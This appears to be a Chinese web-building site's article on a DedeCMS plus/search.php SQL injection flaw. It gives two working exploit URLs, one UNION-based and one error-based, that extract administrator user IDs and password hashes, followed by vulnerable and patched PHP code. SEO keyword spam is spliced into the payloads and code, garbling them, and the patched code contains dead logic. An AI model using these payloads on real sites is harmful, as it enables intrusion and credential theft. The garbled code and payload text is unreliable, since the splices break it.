最新活动:电脑PC端+手机端+微网站+自适应网页多模板选择-建站388元起价!!!
当前位置:主页 > 网站建设 > dedecms plus/search.php注入漏洞修复及利用,dedecms

dedecms plus/search.php注入漏洞修复及利用,dedecms

时间:2023-07-21 10:07:21 阅读: 文章分类: 网站建设 作者: 织梦网站员

导读:dedecmsdedecmsdedecms的最近出的一高危漏洞,search.php注入漏洞;估计现在很多黑阔都非常爱dedecms,因为经常有各种漏洞爆出.很多利用起来也都很简单. 下面织梦文章模板dede网站模板。

织梦文章模板dede网站模板

dedecms的最近出的一高危漏洞,search.php注入漏洞;估计现在很多黑阔都非常爱dedecms,因为经常有各种漏洞爆出.很多利用起来也都很简单.

下面是漏洞的详细利用细节:

0×1:

http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

报错如果为:Safe Alert: Request Error step 2 !

则利用以下exp:http://www.example.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

0×2:

http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

报错如果为:Safe Alert: Request Error step 1 !

则利用以下exp:http://www.example.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+informatio织梦后台模板n_schema.tables+group+by+a)b)%23@`\'`+]=a

漏洞修复:

20130115常规安全更新include/arc.searchview.class.php, 搜索功能准确度优化member/myfriend_group.php, 修复会员中心会员分组功能存在的安全隐患plus/search.php, 修复搜索功能存在的安全隐患

登录DEDECMS后台会有提示,更新即可。不过貌似官方没有提供安全更新补丁的下载地址,找了半天没找到~

漏洞分析:

存在漏洞的文件/plus/search.php

//引入栏目缓存并看关键字是否有相关栏目内容

require_once($typenameCacheFile);

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as dede模板安装$id=>$typename)

{

$keywordn = str_replace($typename, ‘ ‘, $keyword);

if($keyword != $keywordn)

{

$keyword = $keywordn;

$typeid = $id; //对ID没做任何过滤 导致注入

break;

}

}

}

}

$keyword = addslashes(cn_substr($keyword,30));

修复dede5.7模板之后

//引入栏目缓存并看关键字是否有相关栏目内容

require_once($typenameCacheFile);

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as $id=>$typename)

{

//$keywordn = str_replace($typename, ‘ ‘, $keyword);

$keywordn = $keyword;

if($keyword != $keywordn)

{

$keyword = HtmlReplace($keywordn);//防XSS

$typeid = intval($id); //强制转换为数字型

break;

}

}

}

}

$keyword = addslashes(cn_substr($keyword,30));

相关织梦文章模板dede网站模板。

关键词标签: 标签 dedecms 漏洞

声明: 本文由我的SEOUC技术文章主页发布于:2023-07-21 ,文章dedecms plus/search.php注入漏洞修复及利用,dedecms主要讲述漏洞,标签,dedecms网站建设源码以及服务器配置搭建相关技术文章。转载请保留链接: https://www.seouc.com/article/web_33074.html

我的IDC 网站建设技术SEOUC.COM
专注网站建设,SEO优化,小程序设计制作搭建开发定制网站等,数千家网站定制开发案例,网站推广技术服务。
  • 5000+合作客服
  • 8年从业经验
  • 150+覆盖行业
  • 最新热门源码技术文章